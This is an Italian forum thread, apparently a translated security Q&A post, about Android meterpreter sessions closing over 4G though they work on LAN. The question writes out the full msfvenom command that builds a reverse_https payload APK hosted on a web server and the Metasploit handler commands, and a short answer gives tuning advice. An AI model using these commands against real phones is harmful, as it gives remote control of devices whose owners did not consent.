Sessione non valida Android meterpreter

0

Ogni volta che uso un heter metrico inverso su un telefono Android su Internet, viene creata una sessione, ma dopo alcuni secondi si dice che la sessione non è valida e si chiude. Quando lo faccio sulla LAN funziona perfettamente. Quindi qual'è il problema? (Il telefono su cui sto testando il carico utile utilizza la connessione 4G)

Quando creo il carico utile, io uso:

 msfvenom -p android/meterpreter/reverse_https LPORT=4444 LHOST=<public_ip> -o /var/www/html/payload.apk. 

Su metasploit io uso:

use exploit/multi/handler

set payload android/meterpreter/reverse_https

set lport 4444

set lhost local ip

set luri /

set ExitOnSession false

set SessionCommunicationTimeout 0

set SessionExpirationTimeout 0

exploit -j

Dopo tutto questo viene stabilita una connessione ma poi chiusa. E a volte quando creo un nuovo gestore crea sessioni infinite per lo stesso target, continua a crearle finché non chiudo la console, qualcuno può aiutarmi?

    
posta pedro santos 26.09.2016 - 17:54
fonte

1 risposta

1

Anche durante i test per problemi di configurazione, impostare exitonsession su true.

se stai utilizzando il tuo browser web per consegnare il payload, può continuare a eseguire cicli fino a quando fallisce.

impostando exitonsession rallenterai un po 'le cose per te e smetterai di creare così tante sessioni.

    
risposta data 27.09.2016 - 04:53
fonte

Leggi altre domande sui tag